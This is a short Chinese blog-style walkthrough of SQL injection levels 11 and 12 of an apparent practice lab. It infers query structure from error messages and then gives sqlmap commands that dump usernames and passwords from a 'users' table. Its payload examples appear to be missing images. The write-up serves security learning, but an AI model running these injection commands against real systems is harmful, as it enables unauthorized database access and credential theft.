这里面 需要用到的工具是   Burp Suite  这款 优秀的抓包工具   然后还有sqlmap 等等  

抓包的教程  有很多 这里就不一一叙述了 

我们先来看一下 11这个关卡 

 然后 这里  可以直接输入 看返回结果 比如 

也可以 截取 数据包  然后用  

 

来发送    其中呢   我们可以 通过报错信息来猜测闭合的信息   

比如 我们输入了 是 admid\    报错是    123456'  limit 0，1  那么  

我们可以 推测  这个的信息  是 

select  name,password from admin  where name='xxxx'  and password ='xxxx'

其中 我们的 \   把 xxxx 后面的  '给转译成 正常的字符  那么  是由  password 第一个'来闭合的  那么 后面的 123456’自然的就报错了  那么 这里我们就有很多要写的东西了

我们直接 这样 

构造了一个闭合   就直接 可以显示出来了   正确的

然后我们看 12 

  

 这里的报错是   “123456\”  那么 

我们可以 构造闭合 

登陆成功@！！！

然后就是 就   用sqlmap 跑程序 

首先把数据包复制下来

；

然后 用sqlmap 跑一下

 

py -2  sqlmap.py -r  C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E --current-db --batch

py -2  sqlmap.py -r  C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E -D security --tables --batch 

py -2  sqlmap.py -r  C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E -T users --columns --batch

 py -2  sqlmap.py -r  C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E -T users -C'username,password' --dump  --batch